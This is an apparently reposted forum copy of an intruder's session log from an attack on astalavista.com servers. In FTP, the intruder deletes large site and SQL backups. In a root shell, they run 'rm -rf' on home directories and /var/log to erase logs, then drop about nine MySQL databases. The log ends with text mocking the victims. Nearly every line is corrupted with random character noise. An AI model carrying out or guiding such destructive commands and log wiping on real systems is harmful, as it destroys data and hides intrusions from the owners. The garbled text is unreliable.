ftp> ls -la
9 j! D3 w r# o) g7 Q227 Entering Passive Mode (212,254,194,163,2,188)+ i9 R! i4 O& d2 b! j) Q
150 Opening BINARY mode data connection for ‘file list’.0 C; W$ O( [( @
dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
) O3 r7 e% T4 |! q226 Transfer complete.- w' w& ]1 J' @4 |1 P
ftp> cd astalavista.com
: g. Y$ i. J: R( x8 [# ]& p0 `250 CWD command successful.% h5 R( d; o# N! u' S, y+ h
ftp> ls -la
; a% J7 ]- ?! J N: E227 Entering Passive Mode (212,254,194,163,2,189): X+ O8 K. m) i; e. S! W0 O6 E
150 Opening BINARY mode data connection for ‘file list’.; A, `- V. t, ]) |
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar4 O+ D% X1 `+ `3 [+ ~5 I
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2% D( `; e7 Q& i+ e* V
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2/ D4 B/ p- s& v3 h0 l# E4 V
-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
% g- I# U8 T. ^, @-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar- W3 h0 N* j. @, ]9 a4 E1 }
[snip]
) }+ ?) X. m# c: M: Y. I226 Transfer complete.8 y% d k0 u" ]5 m8 r! V
ftp> mdelete *
% [( m/ E& r$ K9 B1 | b2 nftp> ls -la& A. s1 e" G, [5 a" Q1 X* t1 t% v
227 Entering Passive Mode (212,254,194,163,2,193) }7 a6 q7 c% ]8 s, U+ i
150 Opening BINARY mode data connection for ‘file list’.: S% n& F. W& q& ]" Y% @7 d* q
226 Transfer complete.* p& A U4 b9 P0 a
ftp>3 {4 u9 G' F+ e% L% @! f
0 @' W9 g7 i5 ?, P5 xsh-3.2# cd /home
5 Z' U: J$ |8 k* ?8 K3 Bsh-3.2# ls -la: m) H! \0 ?0 y, A
total 120$ ?, o6 ]' i+ ~: {6 I& h( s
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
6 r: d1 M+ [. w' o- X. ldrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
3 E! T l# y E- u$ `* ydrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
' O8 z6 Z% R, t, L% [5 s-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
8 P$ i* e2 G' _, h q-rw——- 1 root root 8192 Jun 3 02:45 aquota.user- L$ ^* o5 ^& d( ?; F) v# d3 C
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet$ X( j/ i; {' E7 V
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
/ X+ T4 }- [3 ^# `drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.141614 P& H) N; l) W$ ]
drwx–x–x 10 com com 4096 Apr 28 12:40 com
/ o+ L8 H C, }/ |5 f' L adrwxr-xr-x 2 root root 4096 May 17 2007 ftp, m0 |1 E6 @# F
drwx—— 3 jon jon 4096 Sep 21 2007 jon
4 n* i# m5 }: {! { v, k' |drwx—— 2 root root 16384 Sep 11 2007 lost+found
) b% [8 K# }" P& }( C0 S, adrwxr-xr-x 2 root root 4096 Sep 14 2007 my
2 X' V$ Q# X* J( G" {; r* }+ ddrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
8 H8 n/ u$ B, }* edrwx—— 2 jon jon 4096 Sep 15 2007 test
/ [$ Y4 g3 q% |) _ W+ Ldrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp2 w6 d/ O' V" r2 B
, u% D4 _% X) |4 B4 f" Y. r9 M
sh-3.2# rm -rf backup/
' J/ Z6 c2 c; U6 r2 g7 lsh-3.2# rm -rf backup.14161/: [. v( C" C; }3 H `; O
sh-3.2# rm -rf ftp/" l' t# R: q0 s! H8 O9 C3 i
sh-3.2# rm -rf jon/, R( [, G0 _: \; }8 ^$ t b' N* {
sh-3.2# rm -rf my/
( m) j2 Y' n5 {8 o+ _# Vsh-3.2# rm -rf mysqldata/" a3 y* l! ^: Y
sh-3.2# rm -rf test/7 M% z2 S* d% D8 U/ [. V
sh-3.2# rm -rf tmp/+ C: h' n' ?* s. ?6 T, S; W
sh-3.2# cd ~1 v g2 e" P7 O
sh-3.2# rm -rf *
|2 e7 H) i. y6 ~sh-3.2# rm -rf /var/log/
4 w% k& a3 ]" N$ q* g- @* w( Srm: cannot remove directory `/var/log//proftpd’: Directory not empty
' f5 X/ q6 s5 z" a+ m7 Hsh-3.2# rm -rf /home/*' g, [! z2 x$ {. d: g
sh-3.2# mysql
2 s3 E, i+ i$ B" \$ Q& UWelcome to the MySQL monitor. Commands end with ; or \g.! ^* G- W8 A" D2 }$ Z
Your MySQL connection id is 407156
# j9 |: k, H% J0 o! EServer version: 5.0.45-community-log MySQL Community Edition (GPL)
7 G* {+ R0 P: U
o3 P8 ]- F9 d# I( wType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
7 d3 ^$ g6 j9 [ X' y1 J$ i6 D2 }. r( Y" A4 O$ i
mysql> show databases;' J& R# A3 P$ D7 w& y
+———————–+; _7 E7 k& ]# m( u
| Database |& l3 w: f. G+ k
+———————–+
* [: J/ P' }# G' k1 b, P* R) m- Y6 L| information_schema |8 P% y* }3 k8 n. ~: Y' Q
| astanet_ads |
- l3 e* ^6 ~! c9 ^9 S8 D- _: i| astanet_mailing_lists |* Z9 \& \5 }2 A3 L& n8 W
| astanet_mediawiki |$ G# e# q& m$ m( l9 f2 W
| astanet_membersystem |
; Q2 }' {7 G5 d8 `, N& j3 j4 c1 N| com_contrexx |, f/ L1 o E- L7 j
| com_contrexx2 |
' M* m: c) e: ]" e6 b0 {- }' q| com_contrexx2_live |
9 P3 k) j! A' v' y9 `: B2 O6 _$ K| da_roundcube |0 w3 k. {0 G8 Z3 e1 d
| dolphin |3 P% S G0 O4 S4 D c7 i" K' S
| ideapool |9 [. z/ [ X( j6 k- w% z7 x
| mysql |
# n# r3 Z# W& g0 ]$ V| test |
, T( w% A- N+ M; `8 u2 o| yourmaster |
5 J: q2 f/ P9 l' f6 y# a9 V+———————–+
6 R- M6 u; f0 j7 j14 rows in set (0.03 sec)# F, F `5 U' A" R8 I H
c* B- i( H2 o8 |. N. V
mysql> drop database astanet_membersystem;
8 z& g7 L9 R0 S& OdroQuery OK, 46 rows affected (0.81 sec)! X, L- D2 `3 \. N* K( Z
0 j9 _2 `1 M R/ |' \# i
mysql> drop database com_contrexx;
- p! |" `: q2 q9 hQuery OK, 211 rows affected (2.72 sec)' Z% j/ ?4 ]. J' V' q0 A. l. ~
1 u0 d3 ?/ X9 W" }; E6 R. B+ q" L% omysql> drop database com_contrexx2;& V: z- Q- L& `/ w- U9 ~
Query OK, 237 rows affected (2.23 sec)
. A, O. Q& b: p# m1 }* _
9 L+ s8 r0 Q- p/ C% Q9 G1 |4 ~mysql> drop database com_contrexx2_live;
! H' d" q: O& x2 ~8 B! e+ EQuery OK, 227 rows affected (7.63 sec)
/ p$ q, D/ \+ o2 [( \
2 H# v! B! l4 L2 n) y7 S1 _) amysql> drop database ideapool;* Z; O& e) y7 E; ` ~9 k7 }
Query OK, 69 rows affected (0.19 sec)" A: R1 H; d }2 r3 L
: |" S g: h& i
mysql> drop database yourmaster;3 T% |* ^6 Q0 r8 }
Query OK, 158 rows affected (0.55 sec)
# t1 ^% e: C. W) U' O
! p/ a0 H2 w# a6 q* hmysql> drop database astanet_ads;
! ]- E. W1 G" ?% W1 _6 t1 q( vQuery OK, 9 rows affected (0.11 sec)
! ^9 F9 q7 y+ _) |$ r3 v! d/ k& {
& n! {& d+ K: b( h- tmysql> drop database astanet_mailing_lists;
1 s8 M. q4 E7 Y/ _5 N1 G5 B, G& XQuery OK, 24 rows affected (1.47 sec)
5 q8 ?) C- I: o
/ A9 a z/ H+ }3 _6 V' umysql> drop database astanet_mediawiki; m c$ f+ l9 m% ^: \
Query OK, 31 rows affected (0.51 sec). v# ~' R% L6 x, U. F; c
" |4 L: R. \7 O* A3 f1 u. `$ `mysql> show databases; E- B$ R& b4 U* W7 U5 r8 [
+——————–+! H: S) f% v% v! I, C) r
| Database |( {- d3 t" G9 E x7 N2 Y) |8 Z
+——————–+! ~- h1 W0 [8 x
| information_schema |# i( q. e$ z/ ~( U* T6 n
| da_roundcube |; K0 n& F0 h+ E# l) @ v& k/ W; b
| dolphin |
; B1 y9 f& x- w# j| mysql |
3 I. r* E/ \* D8 q0 A, Y| test |& v& V3 Y ]6 h, S. ^3 k
+——————–+
b L8 e1 n0 ]' r h5 rows in set (0.00 sec)9 i! F" _' D# I- J+ t4 x* v
( t3 q- o* k% C- P0 d, t5 d2 F
What a journey! We’re not sure exactly why the “Terminator” had any influence on
4 h* O1 y! Y4 ?7 [2 e+ u b A2 ntheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the
, X) T! c$ N1 i1 w) Jwrong to say this pack of morons *wont be back*.1 N, Z1 N0 q7 M q
|
发表于 2012-11-6 21:07:34
收藏
支持
反对